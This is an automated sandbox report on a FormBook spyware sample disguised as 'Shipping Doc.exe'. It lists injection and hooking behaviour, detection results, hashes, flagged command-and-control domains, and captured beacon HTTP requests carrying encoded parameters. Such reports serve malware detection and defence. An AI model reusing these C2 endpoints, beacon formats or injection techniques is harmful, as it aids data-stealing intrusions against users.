          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Timestomp 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          Behavior Graph ID: 458885; Sample: Shipping Doc.exe; Startdate: 03/08/2021; Architecture: WINDOWS; Score: 100
          Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
          • Shipping Doc.exe (started); dropped file: C:\Users\user\...\Shipping Doc.exe.log, ASCII
          • Shipping Doc.exe (started by Shipping Doc.exe); signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected by Shipping Doc.exe); signature: System process connects to network (likely due to code injection or exploit); DNS/IP: www.bigdaddy.fish 208.113.204.236, 49742, 80 DREAMHOST-ASUS United States; www.davinescosmetics.com; davinescosmetics.com 34.102.136.180, 49744, 80 GOOGLEUS United States
          • cscript.exe (started by explorer.exe); signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started by cscript.exe)
          • conhost.exe (started by cmd.exe)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Shipping Doc.exe | 51% | Virustotal |
          Shipping Doc.exe | 37% | Metadefender |
          Shipping Doc.exe | 26% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
          Shipping Doc.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.2.Shipping Doc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.bigdaddy.fish | 208.113.204.236 | true | true | | unknown
          davinescosmetics.com | 34.102.136.180 | true | false | | unknown
          www.davinescosmetics.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.davinescosmetics.com/amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR | false | Avira URL Cloud: safe | unknown
          http://www.bigdaddy.fish/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR | true | Avira URL Cloud: safe | unknown
          www.shopjempress.com/amb6/ | true | Avira URL Cloud: safe | low

                URLs from Memory and Binaries

                        unknown
                        http://www.galapagosdesign.com/staff/dennis.htmShipping Doc.exe, 00000002.00000003.222324750.0000000005792000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.jiyu-kobo.co.jp/en-uShipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://fontfabrik.comexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comalsdnShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.jiyu-kobo.co.jp/8Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comlicdShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.founder.com.cn/cnyShipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fonts.comicVShipping Doc.exe, 00000002.00000003.213525769.000000000579B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.jiyu-kobo.co.jp/0Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.ascendercorp.com/typedesigners.htmlShipping Doc.exe, 00000002.00000003.218505402.00000000057C6000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fonts.comexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          high
                          http://www.sandoll.co.krexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.urwpp.deDPleaseexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sakkal.comcShipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.urwpp.deShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.zhongyicts.com.cnexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sakkal.comShipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.jiyu-kobo.co.jp/Y0aShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.sajatypeworks.coma7Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.founder.com.cn/cndShipping Doc.exe, 00000002.00000003.215912066.000000000578E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                              high
                              http://www.jiyu-kobo.co.jp/UShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlCcscript.exe, 0000000F.00000002.483172630.0000000005E2F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/jp/nShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/jp/qShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cnzShipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/jp/Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/BShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comdShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.comlexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/;Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/Shipping Doc.exe, 00000002.00000003.216788502.0000000005786000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cnShipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlShipping Doc.exe, 00000002.00000003.219469628.0000000005799000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/Y0/Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn8Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn4Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.jiyu-kobo.co.jp/dShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cn&Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designers/Shipping Doc.exe, 00000002.00000003.219138017.00000000057BE000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.jiyu-kobo.co.jp/en-utShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown

                                      Contacted IPs

                                      Public

                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                      34.102.136.180 | davinescosmetics.com | United States | 15169 | GOOGLEUS | false
                                      208.113.204.236 | www.bigdaddy.fish | United States | 26347 | DREAMHOST-ASUS | true

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:458885
                                      Start date:03.08.2021
                                      Start time:20:39:22
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 42s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:Shipping Doc.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:24
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@7/1@2/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 67.2% (good quality ratio 62.1%)
                                      • Quality average: 69.6%
                                      • Quality standard deviation: 31.4%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 49
                                      • Number of non-executed functions: 114
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 13.88.21.125, 23.211.4.86, 20.82.210.154, 173.222.108.226, 173.222.108.210, 51.103.5.186, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.49.157.6
                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net
                                      • Not all processes were analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      Time | Type | Description
                                      20:40:34 | API Interceptor | 1x Sleep call for process: Shipping Doc.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

                                      Match: DREAMHOST-ASUS

                                      Associated Sample Name / URL | Detection | Context
                                      ORDER_0009_PDF.exe | malicious | 69.163.167.176
                                      A77HHPWkxJ.dll | malicious | 208.113.160.88
                                      YaRh8PG41y.exe | malicious | 69.163.228.182
                                      uw01Qp8GcO.exe | malicious | 69.163.228.182
                                      PAYMENT_COPY.exe | malicious | 69.163.224.143
                                      Order-CNS Amura Precision Co., Ltd 9A210118KR.exe | malicious | 69.163.224.174
                                      USD980950_Swift.exe | malicious | 173.236.228.194
                                      Order Signed PEARLTECH contract and PO.exe | malicious | 69.163.224.174
                                      HSBCpaymentSlipPDF.exe | malicious | 69.163.226.116
                                      NEW ORDER.xlsx | malicious | 75.119.198.195
                                      Order_1537-25.exe | malicious | 208.113.197.232
                                      Order 5122948.xlsb | malicious | 64.111.126.83
                                      Order 5122948.xlsb | malicious | 64.111.126.83
                                      INS 0966828.xlsb | malicious | 64.111.126.83
                                      Order 2522592.xlsb | malicious | 64.111.126.83
                                      INS 0966828.xlsb | malicious | 64.111.126.83
                                      Order 2522592.xlsb | malicious | 64.111.126.83
                                      INS 53614716.xlsb | malicious | 64.111.126.83
                                      WO 2825876.xlsb | malicious | 64.111.126.83
                                      INS 53614716.xlsb | malicious | 64.111.126.83

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Doc.exe.log
                                      Process:C:\Users\user\Desktop\Shipping Doc.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.355304211458859
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                      MD5:69206D3AF7D6EFD08F4B4726998856D3
                                      SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                      SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                      SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.195385958745407
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      File name:Shipping Doc.exe
                                      File size:1037312
                                      MD5:159d560ff64cdb2d130b1635f4123a49
                                      SHA1:5762036dd01f8a63ce29557c5c0464360500c7e6
                                      SHA256:065252f5ed5475c89d2bff7389554a4695a85900a7a75eb98170c6a372b33ea0
                                      SHA512:be415739b37b83d24c0d097680ddc2450be5de89f0b844c4b9790c039626f79ffac32f006b9c0febe37c84c519c703c65e03d2648c836b1f0dcd404c0026c4a6
                                      SSDEEP:24576:XB8ns9/deerxEjxbzXDusP8z5y8dWImtw:X4TuDcDImC
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H..............................~.... ........@.. .......................@............@................................

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x4fe87e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0xAAC44811 [Thu Oct 14 14:37:05 2060 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al

                                      Data Directories

                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfe830 | 0x4b | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x5d8 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x102000 | 0xc | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                      Sections

                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x2000 | 0xfc884 | 0xfca00 | False | 0.696450937036 | data | 7.2014231354 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0x100000 | 0x5d8 | 0x600 | False | 0.4296875 | data | 4.13984531351 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0x102000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name | RVA | Size | Type | Language | Country
                                      RT_VERSION | 0x1000a0 | 0x34c | data | |
                                      RT_MANIFEST | 0x1003ec | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                      Imports

                                      DLL | Import
                                      mscoree.dll | _CorExeMain

                                      Version Infos

                                      Description | Data
                                      Translation | 0x0000 0x04b0
                                      LegalCopyright | Copyright 2019
                                      Assembly Version | 1.0.0.0
                                      InternalName | RemotingSurroga.exe
                                      FileVersion | 1.0.0.0
                                      CompanyName |
                                      LegalTrademarks |
                                      Comments |
                                      ProductName | ControlLibrary
                                      ProductVersion | 1.0.0.0
                                      FileDescription | ControlLibrary
                                      OriginalFilename | RemotingSurroga.exe

                                      Network Behavior

                                      Snort IDS Alerts

                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                      08/03/21-20:42:09.835215 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49744 | 34.102.136.180 | 192.168.2.3

                                      Network Port Distribution

                                      TCP Packets


                                      UDP Packets


                                      DNS Queries

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                      Aug 3, 2021 20:41:48.954216957 CEST | 192.168.2.3 | 8.8.8.8 | 0xe08b | Standard query (0) | www.bigdaddy.fish | A (IP address) | IN (0x0001)
                                      Aug 3, 2021 20:42:09.661616087 CEST | 192.168.2.3 | 8.8.8.8 | 0x9ec5 | Standard query (0) | www.davinescosmetics.com | A (IP address) | IN (0x0001)

                                      DNS Answers

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                      Aug 3, 2021 20:41:49.091502905 CEST | 8.8.8.8 | 192.168.2.3 | 0xe08b | No error (0) | www.bigdaddy.fish | | 208.113.204.236 | A (IP address) | IN (0x0001)
                                      Aug 3, 2021 20:42:09.698745966 CEST | 8.8.8.8 | 192.168.2.3 | 0x9ec5 | No error (0) | www.davinescosmetics.com | davinescosmetics.com | | CNAME (Canonical name) | IN (0x0001)
                                      Aug 3, 2021 20:42:09.698745966 CEST | 8.8.8.8 | 192.168.2.3 | 0x9ec5 | No error (0) | davinescosmetics.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.bigdaddy.fish
                                      • www.davinescosmetics.com

                                      HTTP Packets

                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.3 | 49742 | 208.113.204.236 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Aug 3, 2021 20:41:49.208802938 CEST | 6582 | OUT | GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1
                                      Host: www.bigdaddy.fish
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Aug 3, 2021 20:41:49.321682930 CEST | 6582 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Tue, 03 Aug 2021 18:41:49 GMT
                                      Server: Apache
                                      Location: http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR
                                      Content-Length: 330
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&amp;l8B=RjAhR">here</a>.</p></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      1 | 192.168.2.3 | 49744 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Aug 3, 2021 20:42:09.720345020 CEST | 6593 | OUT | GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1
                                      Host: www.davinescosmetics.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Aug 3, 2021 20:42:09.835215092 CEST | 6594 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Tue, 03 Aug 2021 18:42:09 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "61048812-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function Name | Hook Type | Active in Processes
                                      PeekMessageA | INLINE | explorer.exe
                                      PeekMessageW | INLINE | explorer.exe
                                      GetMessageW | INLINE | explorer.exe
                                      GetMessageA | INLINE | explorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function Name | Hook Type | New Data
                                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE3
                                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE3
                                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE3
                                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE3

                                      System Behavior

                                      General

                                      Start time: 20:40:13
                                      Start date: 03/08/2021
                                      Path: C:\Users\user\Desktop\Shipping Doc.exe
                                      Wow64 process (32bit): true
                                      Commandline: 'C:\Users\user\Desktop\Shipping Doc.exe'
                                      Imagebase: 0x3b0000
                                      File size: 1037312 bytes
                                      MD5 hash: 159D560FF64CDB2D130B1635F4123A49
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: .Net C# or VB.NET
                                      Reputation: low

                                      General

                                      Start time: 20:40:35
                                      Start date: 03/08/2021
                                      Path: C:\Users\user\Desktop\Shipping Doc.exe
                                      Wow64 process (32bit): true
                                      Commandline: C:\Users\user\Desktop\Shipping Doc.exe
                                      Imagebase: 0xe90000
                                      File size: 1037312 bytes
                                      MD5 hash: 159D560FF64CDB2D130B1635F4123A49
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
